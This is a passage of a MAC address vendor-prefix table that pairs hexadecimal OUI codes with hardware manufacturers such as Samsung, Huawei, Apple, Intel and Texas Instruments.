mobile ltd 502B73 Tenda Technology Co.,Ltd.Dongguan branch B4E782 Vivalnk A03BE3 Apple, Inc. 4C3275 Apple, Inc. 487A55 ALE International 001EAE Continental Automotive Systems Inc. 2CBABA Samsung Electronics Co.,Ltd 40D3AE Samsung Electronics Co.,Ltd 2CDD95 Taicang T&W Electronics D03DC3 AQ Corporation EC01E2 FOXCONN INTERCONNECT TECHNOLOGY 9C7DA3 HUAWEI TECHNOLOGIES CO.,LTD 88E87F Apple, Inc. 9CF48E Apple, Inc. 5CF7E6 Apple, Inc. B853AC Apple, Inc. 203CAE Apple, Inc. 1861C7 lemonbeat GmbH B4F81E Kinova ACAB2E Beijing LasNubes Technology Co., Ltd. 000678 D&M Holdings Inc. E0286D AVM Audiovisuelles Marketing und Computersysteme GmbH 600B03 Hangzhou H3C Technologies Co., Limited A0AB1B D-Link International 205D47 vivo Mobile Communication Co., Ltd. 10C60C Domino UK Ltd 043110 Inspur Group Co., Ltd. 949AA9 Microsoft Corporation D842E2 Canary Connect, Inc. C8B21E CHIPSEA TECHNOLOGIES (SHENZHEN) CORP. C8E776 PTCOM Technology E0686D Raybased AB 702E22 zte corporation 884CCF Pulzze Systems, Inc E41218 ShenZhen Rapoo Technology Co., Ltd. 001984 ESTIC Corporation 3816D1 Samsung Electronics Co.,Ltd D0176A Samsung Electronics Co.,Ltd D48890 Samsung Electronics Co.,Ltd 5492BE Samsung Electronics Co.,Ltd 001628 Magicard Ltd 5C0A5B SAMSUNG ELECTRO MECHANICS CO., LTD. 000278 SAMSUNG ELECTRO MECHANICS CO., LTD. 8056F2 Hon Hai Precision Ind. Co.,Ltd. 00212F Phoebe Micro Inc. 3859F9 Hon Hai Precision Ind. Co.,Ltd. EC55F9 Hon Hai Precision Ind. Co.,Ltd. 906EBB Hon Hai Precision Ind. Co.,Ltd. 18F46A Hon Hai Precision Ind. Co.,Ltd. 4C0F6E Hon Hai Precision Ind. Co.,Ltd. 78E400 Hon Hai Precision Ind. Co.,Ltd. 001C43 Samsung Electronics Co.,Ltd 0023D6 Samsung Electronics Co.,Ltd 001B98 Samsung Electronics Co.,Ltd 001A8A Samsung Electronics Co.,Ltd 3C5A37 Samsung Electronics Co.,Ltd F49F54 Samsung Electronics Co.,Ltd 34C3AC Samsung Electronics Co.,Ltd 44F459 Samsung Electronics Co.,Ltd 00265D Samsung Electronics Co.,Ltd 002567 Samsung Electronics Co.,Ltd C4731E Samsung Electronics Co.,Ltd 9852B1 Samsung Electronics Co.,Ltd 14F42A Samsung Electronics Co.,Ltd 0808C2 Samsung Electronics Co.,Ltd CCFE3C Samsung Electronics Co.,Ltd 28BAB5 Samsung Electronics Co.,Ltd E440E2 Samsung Electronics Co.,Ltd 103B59 Samsung Electronics Co.,Ltd 7CE9D3 Hon Hai Precision Ind. Co.,Ltd. 1C3E84 Hon Hai Precision Ind. Co.,Ltd. B8763F Hon Hai Precision Ind. Co.,Ltd. 60F494 Hon Hai Precision Ind. Co.,Ltd. BCB1F3 Samsung Electronics Co.,Ltd 1C62B8 Samsung Electronics Co.,Ltd CCF9E8 Samsung Electronics Co.,Ltd D857EF Samsung Electronics Co.,Ltd 18E2C2 Samsung Electronics Co.,Ltd 002399 Samsung Electronics Co.,Ltd 7CF854 Samsung Electronics Co.,Ltd 002A10 Cisco Systems, Inc 00A289 Cisco Systems, Inc 44E9DD Sagemcom Broadband SAS 000F5E Veo 001328 Westech Korea Inc., B8BF83 Intel Corporate 7C79E8 PayRange Inc. A43111 ZIV 008073 DWB ASSOCIATES 80A1D7 Shanghai DareGlobal Technologies Co.,Ltd 0026D9 ARRIS Group, Inc. 8C6102 Beijing Baofengmojing Technologies Co., Ltd 548CA0 Liteon Technology Corporation 44D6E1 Snuza International Pty. Ltd. 486DBB Vestel Elektronik San ve Tic. A.S. BC8AA3 NHN Entertainment A8BD27 Hewlett Packard Enterprise 8C0D76 HUAWEI TECHNOLOGIES CO.,LTD 84BE52 HUAWEI TECHNOLOGIES CO.,LTD 849FB5 HUAWEI TECHNOLOGIES CO.,LTD A4CAA0 HUAWEI TECHNOLOGIES CO.,LTD 84E0F4 IEEE Registration Authority D83062 Apple, Inc. E4121D Samsung Electronics Co.,Ltd E8508B SAMSUNG ELECTRO-MECHANICS(THAILAND) F8042E SAMSUNG ELECTRO-MECHANICS(THAILAND) EC1F72 SAMSUNG ELECTRO-MECHANICS(THAILAND) 00D037 ARRIS Group, Inc. 84E058 ARRIS Group, Inc. 707630 ARRIS Group, Inc. D0E54D ARRIS Group, Inc. A0C562 ARRIS Group, Inc. 8496D8 ARRIS Group, Inc. D890E8 Samsung Electronics Co.,Ltd C462EA Samsung Electronics Co.,Ltd 182666 Samsung Electronics Co.,Ltd 30D6C9 Samsung Electronics Co.,Ltd CC07AB Samsung Electronics Co.,Ltd B43A28 Samsung Electronics Co.,Ltd 78A873 Samsung Electronics Co.,Ltd 345760 MitraStar Technology Corp. C0D391 IEEE Registration Authority D49B5C Chongqing Miedu Technology Co., Ltd. 001988 Wi2Wi, Inc 18DC56 Yulong Computer Telecommunication Scientific (Shenzhen) Co.,Ltd 0016F2 Dmobile System Co., Ltd. 001F9A Nortel Networks 000A0E Invivo Research Inc. 00C017 NetAlly 5CB066 ARRIS Group, Inc. 002261 Frontier Silicon Ltd 04BBF9 Pavilion Data Systems Inc E4BEED Netcore Technology Inc. 58FB84 Intel Corporate E8EB11 Texas Instruments 00E011 UNIDEN CORPORATION 002555 Visonic Technologies 1993 Ltd. 58986F Revolution Display 3C6FEA Panasonic India Pvt. Ltd. 44BFE3 Shenzhen Longtech Electronics Co.,Ltd 34074F AccelStor, Inc. B4A984 Symantec Corporation B0B28F Sagemcom Broadband SAS 441441 AudioControl Inc. C81FBE HUAWEI TECHNOLOGIES CO.,LTD 203DB2 HUAWEI TECHNOLOGIES CO.,LTD 48D539 HUAWEI TECHNOLOGIES CO.,LTD C88D83 HUAWEI TECHNOLOGIES CO.,LTD D84FB8 LG ELECTRONICS 000AEB TP-LINK TECHNOLOGIES CO.,LTD. 2C3731 SHENZHEN YIFANG DIGITAL TECHNOLOGY CO.,LTD. 60EE5C SHENZHEN FAST TECHNOLOGIES CO.,LTD 6488FF Sichuan Changhong Electric Ltd. 0CA402 Alcatel-Lucent IPD A0F3E4 Alcatel-Lucent IPD 84DBFC Nokia 3C404F GUANGDONG PISEN ELECTRONICS CO.,LTD C4084A Nokia 000801 HighSpeed Surfing Inc. 000772 Alcatel-Lucent Shanghai Bell Co., Ltd E03005 Alcatel-Lucent Shanghai Bell Co., Ltd 001660 Nortel Networks 001E7E Nortel Networks 001365 Nortel Networks 002162 Nortel Networks 02E6D3 NIXDORF COMPUTER CORP. 0016B9 ProCurve Networking by HP 000438 Nortel Networks 000EC0 Nortel Networks F895C7 LG Electronics (Mobile Communications) 84D931 Hangzhou H3C Technologies Co., Limited 7CFC3C Visteon Corporation 981E0F Jeelan (Shanghai Jeelan Technology Information Inc 90A46A SISNET CO., LTD 14E7C8 Integrated Device Technology (Malaysia) Sdn. Bhd. 9CA3A9 Guangzhou Juan Optical and Electronical Tech Joint Stock Co., Ltd 7CC709 SHENZHEN RF-LINK TECHNOLOGY CO.,LTD. 0821EF Samsung Electronics Co.,Ltd 34145F Samsung Electronics Co.,Ltd 4888CA Motorola (Wuhan) Mobility Technologies Communication Co., Ltd. 385610 CANDY HOUSE, Inc. 00A742 Cisco Systems, Inc A03E6B IEEE Registration Authority 9802D8 IEEE Registration Authority 64FB81 IEEE Registration Authority 00116E Peplink International Ltd. 540955 zte corporation 2C265F IEEE Registration Authority C041F6 LG ELECTRONICS INC 001E75 LG Electronics (Mobile Communications) 001C62 LG Electronics (Mobile Communications) 505527 LG Electronics (Mobile Communications) 88C9D0 LG Electronics (Mobile Communications) 8C3AE3 LG Electronics (Mobile Communications) 00AA70 LG Electronics (Mobile Communications) E4509A HW Communications Ltd 702900 Shenzhen ChipTrip Technology Co,Ltd ECAAA0 PEGATRON CORPORATION 60E3AC LG Electronics (Mobile Communications) 90F052 MEIZU Technology Co., Ltd. 8CFDF0 Qualcomm Inc. C4BB4C Zebra Information Tech Co. Ltd 98CF53 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. D4A148 HUAWEI TECHNOLOGIES CO.,LTD D065CA HUAWEI TECHNOLOGIES CO.,LTD 8CEBC6 HUAWEI TECHNOLOGIES CO.,LTD B08900 HUAWEI TECHNOLOGIES CO.,LTD ECCD6D Allied Telesis, Inc. 18339D Cisco Systems, Inc 146102 Alps Alpine 54276C Jiangsu Houge Technology Corp. D0052A Arcadyan Corporation EC6881 Palo Alto Networks 4C0BBE Microsoft 0C2576 LONGCHEER TELECOMMUNICATION LIMITED D8D43C Sony Corporation 486B2C BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 6C25B9 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 2C282D BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 4813F3 BBK EDUCATIONAL ELECTRONICS CORP.,LTD. 00409F Telco Systems, Inc. 002397 Westell Technologies Inc. 00E0DD Zenith Electronics Corporation 50CE75 Measy Electronics Co., Ltd. 000C29 VMware, Inc. 000569 VMware, Inc. 00045B Techsan Electronics Co., Ltd. 0007BA UTStarcom Inc 90A210 United Telecoms Ltd 6C0B84 Universal Global Scientific Industrial Co., Ltd. 001639 Ubiquam Co., Ltd. 001597 AETA AUDIO SYSTEMS 000B0E Trapeze Networks 00C000 LANOPTICS, LTD. 845181 Samsung Electronics Co.,Ltd 9CDD1F Intelligent Steward Co.,Ltd 3C6816 VXi Corporation E811CA SHANDONG KAER ELECTRIC.CO.,LTD B456B9 Teraspek Technologies Co.,Ltd E4029B Intel Corporate DC1AC5 vivo Mobile Communication Co., Ltd. F45EAB Texas Instruments A8FCB7 Consolidated Resource Imaging C816BD Qingdao Hisense Communications Co.,Ltd. 00001F Telco Systems, Inc. 00A012 Telco Systems, Inc. F0DEF1 Wistron Infocomm (Zhongshan) Corporation F80F41 Wistron Infocomm (Zhongshan) Corporation 3C970E Wistron InfoComm(Kunshan)Co.,Ltd. 30144A Wistron Neweb Corporation 78CB68 DAEHAP HYPER-TECH 34ED0B Shanghai XZ-COM.CO.,Ltd. 90EF68 Zyxel Communications Corporation 00EBD5 Cisco Systems, Inc 6C9522 Scalys C48F07 Shenzhen Yihao Hulian Science and Technology Co., Ltd. DC7834 LOGICOM SA 18B169 Sonicwall 444450 OttoQ 50F5DA Amazon Technologies Inc. 101212 Vivo International Corporation Pty Ltd C85B76 LCFC(HeFei) Electronics Technology co., ltd F03EBF GOGORO TAIWAN LIMITED 3C92DC Octopod Technology Co. Ltd. 08C021 HUAWEI TECHNOLOGIES CO.,LTD 600810 HUAWEI TECHNOLOGIES CO.,LTD 48435A HUAWEI TECHNOLOGIES CO.,LTD 78FFCA TECNO MOBILE LIMITED 046565 Testop A8BB50 WiZ IoT Company Limited C47C8D IEEE Registration Authority 8C8EF2 Apple, Inc. 1000FD LaonPeople 78009E Samsung Electronics Co.,Ltd ACC33A Samsung Electronics Co.,Ltd 54F201 Samsung Electronics Co.,Ltd 70288B Samsung Electronics Co.,Ltd 348A7B Samsung Electronics Co.,Ltd D0577B Intel Corporate C4A366 zte corporation 6073BC zte corporation 7C3548 Transcend Information 7CB0C2 Intel Corporate A81559 Breathometer, Inc. 4C0B3A TCT mobile ltd E42D02 TCT mobile ltd 0CBD51 TCT mobile ltd 745C9F TCT mobile ltd 8C99E6 TCT mobile ltd 449F7F DataCore Software Corporation 848319 Hangzhou Zero Zero Technology Co., Ltd. D0A4B1 Sonifex Ltd. 0024F4 Kaminario, Ltd. 001A29 Johnson Outdoors Marine Electronics d/b/a Minnkota D89403 Hewlett Packard Enterprise E00EDA Cisco Systems, Inc 50DD4F Automation Components, Inc 341FE4 ARRIS Group, Inc. 001793 Tigi Corporation 000358 Hanyang Digitech Co.Ltd C4CAD9 Hangzhou H3C Technologies Co., Limited 5866BA Hangzhou H3C Technologies Co., Limited 70BAEF Hangzhou H3C Technologies Co., Limited 586AB1 Hangzhou H3C Technologies Co., Limited 90B0ED Apple, Inc. 04D3CF Apple, Inc. 4882F2 Appel Elektronik GmbH 009006 Hamamatsu Photonics K.K. 001AF4 Handreamnet E0C79D Texas Instruments F49EEF Taicang T&W Electronics C4F081 HUAWEI TECHNOLOGIES CO.,LTD 801382 HUAWEI TECHNOLOGIES CO.,LTD 94FE22 HUAWEI TECHNOLOGIES CO.,LTD 00177D IDT Technology Limited 00A045 PHOENIX CONTACT Electronics GmbH 4000E0 Derek(Shaoguan)Limited FCBC9C Vimar Spa E80959 Guoguang Electric Co.,Ltd C825E1 Lemobile Information Technology (Beijing) Co., Ltd 54D9E4 BRILLIANTTS CO., LTD F462D0 Not for Radio, LLC 84002D PEGATRON CORPORATION 408256 Continental Automotive GmbH 608334 HUAWEI TECHNOLOGIES CO.,LTD E47E66 HUAWEI TECHNOLOGIES CO.,LTD 94DBDA HUAWEI TECHNOLOGIES CO.,LTD F0407B Fiberhome Telecommunication Technologies Co.,LTD 94885E Surfilter Network Technology Co., Ltd. 945089 SimonsVoss Technologies GmbH 042AE2 Cisco Systems, Inc E0B6F5 IEEE Registration Authority 002378 GN Netcom A/S 50C971 GN Netcom A/S 0090FA Emulex Corporation 00E0D5 Emulex Corporation 001035 Elitegroup Computer Systems Co.,Ltd. 000AE6 Elitegroup Computer Systems Co.,Ltd. 7427EA Elitegroup Computer Systems Co.,Ltd. 00409C TRANSWARE 0090AE ITALTEL S.p.A/RF-UP-I 649968 Elentec B01BD2 Le Shi Zhi Xin Electronic Technology (Tianjin) Limited 54489C CDOUBLES ELECTRONICS CO. LTD. E4A1E6 Alcatel-Lucent Shanghai Bell Co., Ltd 1CABC0 Hitron Technologies. Inc 002360 Lookit Technology Co., Ltd 986B3D ARRIS Group, Inc. E0071B Hewlett Packard Enterprise 349971 Quanta Storage Inc. 98DED0 TP-LINK TECHNOLOGIES CO.,LTD. 508965 SHENZHEN MERCURY COMMUNICATION TECHNOLOGIES CO.,LTD. 005BA1 shanghai huayuan chuangxin software CO., LTD. 58D67A TCPlink 9C52F8 HUAWEI TECHNOLOGIES CO.,LTD C4BED4 Avaya Inc D017C2 ASUSTek COMPUTER INC. 509EA7 Samsung Electronics Co.,Ltd A88195 Samsung Electronics Co.,Ltd 88ADD2 Samsung Electronics Co.,Ltd 84FEDC Borqs Beijing Ltd. 1C3ADE Samsung Electronics Co.,Ltd 5CC7D7 AZROAD TECHNOLOGY COMPANY LIMITED 98072D Texas Instruments F0C77F Texas Instruments 10DA43 NETGEAR B805AB zte corporation 789682 zte corporation D467E7 Fiberhome Telecommunication Technologies Co.,LTD E42F26 Fiberhome Telecommunication Technologies Co.,LTD 04C1B9 Fiberhome Telecommunication Technologies Co.,LTD 5CF286 IEEE Registration Authority E8FD72 SHANGHAI LINGUO TECHNOLOGY CO., LTD. 98BB1E BYD Precision Manufacture Company Ltd. 04C103 Clover Network, Inc. 208B37 Skyworth Digital Technology(Shenzhen) Co.,Ltd 08BE77 Green Electronics AC5F3E SAMSUNG ELECTRO-MECHANICS(THAILAND) 546D52 TOPVIEW OPTRONICS CORP. 545AA6 Espressif Inc. FC1A11 vivo Mobile Communication Co., Ltd. 280C28 Unigen DataStorage Corporation 00CCFC Cisco Systems, Inc 38FDFE IEEE Registration Authority 2C09CB COBS AB A4BF01 Intel Corporate 002340 MiXTelematics B48B19 Apple, Inc. BCEC5D Apple, Inc. 28A02B Apple, Inc. 0019C5 Sony Interactive Entertainment Inc. 001315 Sony Interactive Entertainment Inc. 001E1E Honeywell Life Safety A0C589 Intel Corporate 1C234F EDMI Europe Ltd A444D1 Wingtech Group (HongKong)Limited 006CFD Sichuan Changhong Electric Ltd. 001742 FUJITSU LIMITED 001999 Fujitsu Technology Solutions GmbH 005A39 SHENZHEN FAST TECHNOLOGIES CO.,LTD A089E4 Skyworth Digital Technology(Shenzhen) Co.,Ltd 5CC6D0 Skyworth Digital Technology(Shenzhen) Co.,Ltd 001A9A Skyworth Digital Technology(Shenzhen) Co.,Ltd CC6DA0 Roku, Inc. A84481 Nokia Corporation 8844F6 Nokia Corporation F44D17 GOLDCARD HIGH-TECH CO.,LTD. 0060DC NEC Magnus Communications,Ltd. 907282 Sagemcom Broadband SAS 38B8EB IEEE Registration Authority 9897D1 MitraStar Technology Corp. B83241 Wuhan Tianyu Information Industry Co., Ltd. 002100 Gemtek Technology Co., Ltd. 002548 Nokia Danmark A/S 0022FC Nokia Danmark A/S 0022FD Nokia Danmark A/S 0021AA Nokia Danmark A/S 001D6E Nokia Danmark A/S C8D10B Nokia Corporation 0023B4 Nokia Danmark A/S 001370 Nokia Danmark A/S 9C1874 Nokia Danmark A/S 001BAF Nokia Danmark A/S 001C35 Nokia Danmark A/S 001C9A Nokia Danmark A/S 001CD6 Nokia Danmark A/S 001CD4 Nokia Danmark A/S 001D98 Nokia Danmark A/S 001DE9 Nokia Danmark A/S 001E3A Nokia Danmark A/S E01D3B Cambridge Industries(Group) Co.,Ltd. C81073 CENTURY OPTICOMM CO.,LTD 343759 zte corporation FC2F40 Calxeda, Inc. 0020D4 Cabletron Systems, Inc. 00E03A Cabletron Systems, Inc. 0016E4 VANGUARD SECURITY ENGINEERING CORP. 3C8970 Neosfar 78CA83 IEEE Registration Authority 0C1167 Cisco Systems, Inc 74EAE8 ARRIS Group, Inc. 0010E7 Breezecom, Ltd. BC620E HUAWEI TECHNOLOGIES CO.,LTD 74A528 HUAWEI TECHNOLOGIES CO.,LTD F88E85 Comtrend Corporation 02CF1C Communication Machinery Corporation 0090F5 CLEVO CO. 50F520 Samsung Electronics Co.,Ltd 64B310 Samsung Electronics Co.,Ltd A4EBD3 Samsung Electronics Co.,Ltd 0030FF DataFab Systems Inc. 000FF6 DARFON LIGHTING CORP 70C76F INNO S 38192F Nokia Corporation 5CF6DC Samsung Electronics Co.,Ltd 0026E4 Canal + 000117 Canal + 50C8E5 Samsung Electronics Co.,Ltd 188331 Samsung Electronics Co.,Ltd 9C65B0 Samsung Electronics Co.,Ltd 8455A5 Samsung Electronics Co.,Ltd A87C01 Samsung Electronics Co.,Ltd B8C68E Samsung Electronics Co.,Ltd 04FE31 Samsung Electronics Co.,Ltd 4CBCA5 Samsung Electronics Co.,Ltd D831CF Samsung Electronics Co.,Ltd B0D09C Samsung Electronics Co.,Ltd 00138F Asiarock Technology Limited 9492BC SYNTECH(HK) TECHNOLOGY LIMITED 001D19 Arcadyan Technology Corporation 0012BF Arcadyan Technology Corporation 507E5D Arcadyan Technology Corporation 7C4FB5 Arcadyan Technology Corporation F40B93 BlackBerry RTS 1C69A5 BlackBerry RTS 94EBCD BlackBerry RTS 204E7F NETGEAR C03F0E NETGEAR 0026F2 NETGEAR 00223F NETGEAR 000FB5 NETGEAR 00095B NETGEAR 001A4F AVM GmbH 001C4A AVM GmbH 00150C AVM GmbH 0026FF BlackBerry RTS A4E4B8 BlackBerry RTS 003067 BIOSTAR Microtech Int'l Corp. 74E7C6 ARRIS Group, Inc. 00230B ARRIS Group, Inc. 002375 ARRIS Group, Inc. 0023A3 ARRIS Group, Inc. 001ADB ARRIS Group, Inc. 001F7E ARRIS Group, Inc. 001C12 ARRIS Group, Inc. 803773 NETGEAR A42B8C NETGEAR 28C68E NETGEAR 04A151 NETGEAR F87394 NETGEAR 001404 ARRIS Group, Inc. 001AAD ARRIS Group, Inc. CC7D37 ARRIS Group, Inc. A47AA4 ARRIS Group, Inc. 001700 ARRIS Group, Inc. 0024C1 ARRIS Group, Inc. 0025F2 ARRIS Group, Inc. 0025F1 ARRIS Group, Inc. 0026BA ARRIS Group, Inc. 54F6C5 FUJIAN STAR-NET COMMUNICATION CO.,LTD 409558 Aisino Corporation 182861 AirTies Wireless Networks 001CA2 ADB Broadband Italia 002233 ADB Broadband Italia 28E347 Liteon Technology Corporation 446D57 Liteon Technology Corporation 9CB70D Liteon Technology Corporation 68A3C4 Liteon Technology Corporation 70F1A1 Liteon Technology Corporation EC086B TP-LINK TECHNOLOGIES CO.,LTD. 5C338E Alpha Networks Inc. 34C3D2 FN-LINK TECHNOLOGY LIMITED 3039F2 ADB Broadband Italia 0017C2 ADB Broadband Italia D0D412 ADB Broadband Italia 0026B8 Actiontec Electronics, Inc 0026FC AcSiP Technology Corp. 689C5E AcSiP Technology Corp. 00EB2D Sony Corporation B4527D Sony Corporation 00D9D1 Sony Interactive Entertainment Inc. B00594 Liteon Technology Corporation 94A1A2 AMPAK Technology, Inc. 00014A Sony Corporation 001EDC Sony Corporation 001D28 Sony Corporation 0011AE ARRIS Group, Inc. 94CCB9 ARRIS Group, Inc. 3C438E ARRIS Group, Inc. 983B16 AMPAK Technology, Inc. 0016B5 ARRIS Group, Inc. 0015A8 ARRIS Group, Inc. 00159A ARRIS Group, Inc. 001180 ARRIS Group, Inc. 000B06 ARRIS Group, Inc. 00D088 ARRIS Group, Inc. 00128A ARRIS Group, Inc. 001813 Sony Corporation 402BA1 Sony Corporation 8400D2 Sony Corporation 303926 Sony Corporation 9C0E4A Shenzhen Vastking Electronic Co.,Ltd. A85840 Cambridge Industries(Group) Co.,Ltd. A0D37A Intel Corporate 8896F2 Valeo Schalter und Sensoren GmbH B046FC MitraStar Technology Corp. E04136 MitraStar Technology Corp. 0015AF AzureWave Technology Inc. 74F06D AzureWave Technology Inc. 44D832 AzureWave Technology Inc. E0B9A5 AzureWave Technology Inc. 781881 AzureWave Technology Inc. 6C71D9 AzureWave Technology Inc. D0E782 AzureWave Technology Inc. 001073 TECHNOBOX, INC. 6CADF8 AzureWave Technology Inc. A81D16 AzureWave Technology Inc. 20934D FUJIAN STAR-NET COMMUNICATION CO.,LTD 009027 Intel Corporation 00A0C9 Intel Corporation 247703 Intel Corporate 74E50B Intel Corporate C48508 Intel Corporate 6805CA Intel Corporate B80305 Intel Corporate 3407FB Ericsson AB A4A1C2 Ericsson AB E09796 HUAWEI TECHNOLOGIES CO.,LTD 000D72 2Wire Inc 001288 2Wire Inc 88074B LG Electronics (Mobile Communications) F4EB38 Sagemcom Broadband SAS 001BBF Sagemcom Broadband SAS 5CF821 Texas Instruments 141FBA IEEE Registration Authority 807B85 IEEE Registration Authority CC1BE0 IEEE Registration Authority F40E11 IEEE Registration Authority E8BE81 Sagemcom Broadband SAS 681590 Sagemcom Broadband SAS 1430C6 Motorola Mobility LLC, a Lenovo Company 141AA3 Motorola Mobility LLC, a Lenovo Company 00217C 2Wire Inc 001FB3 2Wire Inc 28162E 2Wire Inc F81897 2Wire Inc 94C150 2Wire Inc 002569 Sagemcom Broadband SAS 00789E Sagemcom Broadband SAS 8CA982 Intel Corporate BC7737 Intel Corporate D8FC93 Intel Corporate 78E3B5 Hewlett Packard 78ACC0 Hewlett Packard 68B599 Hewlett Packard 1CC1DE Hewlett Packard 3C3556 Cognitec Systems GmbH 3C9066 SmartRG, Inc. 000D88 D-Link Corporation 001195 D-Link Corporation 001346 D-Link Corporation 00D0BD Lattice Semiconductor Corp. (LPA) 001F3A Hon Hai Precision Ind. Co.,Ltd. 647BD4 Texas Instruments 002275 Belkin International Inc. 0057D2 Cisco Systems, Inc 3C6716 Lily Robotics 2C228B CTR SRL 0C6F9C Shaw Communications Inc. 2CE412 Sagemcom Broadband SAS C8A030 Texas Instruments 78C5E5 Texas Instruments 0CFD37 SUSE Linux GmbH 0017E4 Texas Instruments 04E451 Texas Instruments 505663 Texas Instruments 883314 Texas Instruments 44C15C Texas Instruments 1CBDB9 D-Link International B8A386 D-Link International 1C7EE5 D-Link International D8952F Texas Instruments B8FFFE Texas Instruments 0022A5 Texas Instruments 10F681 vivo Mobile Communication Co., Ltd. 9CDFB1 Shenzhen Crave Communication Co., LTD 606944 Apple, Inc. 78F882 LG Electronics (Mobile Communications) 00142F Savvius 28BC18 SourcingOverseas Co. Ltd 807ABF HTC Corporation E043DB Shenzhen ViewAt Technology Co.,Ltd. F40304 Google, Inc. 546009 Google, Inc. A47733 Google, Inc. 34BA75 Everest Networks, Inc 7C18CD E-TRON Co.,Ltd. 94ABDE OMX Technology - FZE 3CCF5B ICOMM HK LIMITED 2405F5 Integrated Device Technology (Malaysia) Sdn. Bhd. 00738D Shenzhen TINNO Mobile Technology Corp. 00E0FC HUAWEI TECHNOLOGIES CO.,LTD 6416F0 HUAWEI TECHNOLOGIES CO.,LTD ACCF85 HUAWEI TECHNOLOGIES CO.,LTD 3871DE Apple, Inc. 7081EB Apple, Inc. C02C7A Shenzhen Horn Audio Co.,Ltd. 1CCB99 TCT mobile ltd A42BB0 TP-LINK TECHNOLOGIES CO.,LTD. 188B45 Cisco Systems, Inc F4CA24 FreeBit Co., Ltd. 0007E9 Intel Corporation 0013E8 Intel Corporate 0013CE Intel Corporate B8B81E Intel Corporate B46D83 Intel Corporate C8348E Intel Corporate 4C3488 Intel Corporate 1002B5 Intel Corporate 004026 BUFFALO.INC 00D0B7 Intel Corporation 001DCE ARRIS Group, Inc. 4CE676 BUFFALO.INC 2C768A Hewlett Packard 001DD6 ARRIS Group, Inc. 903EAB ARRIS Group, Inc. 306023 ARRIS Group, Inc. 14ABF0 ARRIS Group, Inc. 901ACA ARRIS Group, Inc. C83FB4 ARRIS Group, Inc. E0B70A ARRIS Group, Inc. C005C2 ARRIS Group, Inc. 000E35 Intel Corporation 001708 Hewlett Packard 0017A4 Hewlett Packard BCEAFA Hewlett Packard 000BCD Hewlett Packard 000F20 Hewlett Packard 00110A Hewlett Packard 88C255 Texas Instruments CC78AB Texas Instruments 1C7839 Shenzhen Tencent Computer System Co., Ltd. 0453D5 Sysorex Global Holdings EC52DC WORLD MEDIA AND TECHNOLOGY Corp. 94B2CC PIONEER CORPORATION 0452F3 Apple, Inc. 002127 TP-LINK TECHNOLOGIES CO.,LTD. 5C63BF TP-LINK TECHNOLOGIES CO.,LTD. 08EB74 HUMAX Co., Ltd. 2832C5 HUMAX Co., Ltd. 0030C1 Hewlett Packard 0080A0 Hewlett Packard D48564 Hewlett Packard 24BE05 Hewlett Packard FC3FDB Hewlett Packard 00092D HTC Corporation 002269 Hon Hai Precision Ind. Co.,Ltd. D87988 Hon Hai Precision Ind. Co.,Ltd. 74A78E zte corporation E005C5 TP-LINK TECHNOLOGIES CO.,LTD. 388345 TP-LINK TECHNOLOGIES CO.,LTD. EC888F TP-LINK TECHNOLOGIES CO.,LTD. 6466B3 TP-LINK TECHNOLOGIES CO.,LTD. D07E28 Hewlett Packard D0BF9C Hewlett Packard 308D99 Hewlett Packard 5820B1 Hewlett Packard 9457A5 Hewlett Packard 000EB3 Hewlett Packard 080009 Hewlett Packard 7C6193 HTC Corporation 90E7C4 HTC Corporation 90CDB6 Hon Hai Precision Ind. Co.,Ltd. 40490F Hon Hai Precision Ind. Co.,Ltd. 00265C Hon Hai Precision Ind. Co.,Ltd. 7446A0 Hewlett Packard 2C44FD Hewlett Packard 443192 Hewlett Packard A0D3C1 Hewlett Packard 38EAA7 Hewlett Packard AC162D Hewlett Packard 80C16E Hewlett Packard B4B52F Hewlett Packard F0F336 TP-LINK TECHNOLOGIES CO.,LTD. BC4699 TP-LINK TECHNOLOGIES CO.,LTD. F483CD TP-LINK TECHNOLOGIES CO.,LTD. FCD733 TP-LINK TECHNOLOGIES CO.,LTD. 5C899A TP-LINK TECHNOLOGIES CO.,LTD. A81B5A GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 2C5BB8 GUANGDONG OPPO MOBILE TELECOMMUNICATIONS CORP.,LTD 000E6D Murata Manufacturing Co., Ltd. 902106 SKY UK LIMITED 889471 Brocade Communications Systems LLC 8C7CFF Brocade Communications Systems LLC 98F537 zte corporation 001FE2 Hon Hai Precision Ind. Co.,Ltd. 0016CF Hon Hai Precision Ind. Co.,Ltd. 88E3AB HUAWEI TECHNOLOGIES CO.,LTD C40528 HUAWEI TECHNOLOGIES CO.,LTD 3CDFBD HUAWEI TECHNOLOGIES CO.,LTD 509F27 HUAWEI TECHNOLOGIES CO.,LTD 80717A HUAWEI TECHNOLOGIES CO.,LTD 2002AF Murata Manufacturing Co., Ltd. 0021E8 Murata Manufacturing Co., Ltd. D02788 Hon Hai Precision Ind. Co.,Ltd. 904CE5 Hon Hai Precision Ind. Co.,Ltd. 142D27 Hon Hai Precision Ind. Co.,Ltd. 8C34FD HUAWEI TECHNOLOGIES CO.,LTD 587F66 HUAWEI TECHNOLOGIES CO.,LTD 64A651 HUAWEI TECHNOLOGIES CO.,LTD 086361 HUAWEI TECHNOLOGIES CO.,LTD 8CBEBE Xiaomi Communications Co Ltd 14F65A Xiaomi Communications Co Ltd 009EC8 Xiaomi Communications Co Ltd 0C1DAF Xiaomi Communications Co Ltd 3480B3 Xiaomi Communications Co Ltd F48B32 Xiaomi Communications Co Ltd 5C313E Texas Instruments F4B85E Texas Instruments 68C90B Texas Instruments D4F513 Texas Instruments 507224 Texas Instruments ACF7F3 Xiaomi Communications Co Ltd D4970B Xiaomi Communications Co Ltd 04BD70 HUAWEI TECHNOLOGIES CO.,LTD 001AB6 Texas Instruments 0012D1 Texas Instruments 001237 Texas Instruments A0E6F8 Texas Instruments 70FF76 Texas Instruments D03972 Texas Instruments 283CE4 HUAWEI TECHNOLOGIES CO.,LTD 5C4CA9 HUAWEI TECHNOLOGIES CO.,LTD F4C714 HUAWEI TECHNOLOGIES CO.,LTD 286ED4 HUAWEI TECHNOLOGIES CO.,LTD D842AC Shanghai Feixun Communication Co.,Ltd. 5439DF HUAWEI TECHNOLOGIES CO.,LTD 74882A HUAWEI TECHNOLOGIES CO.,LTD 0819A6 HUAWEI TECHNOLOGIES CO.,LTD 3CF808 HUAWEI TECHNOLOGIES CO.,LTD 486276 HUAWEI TECHNOLOGIES CO.,LTD 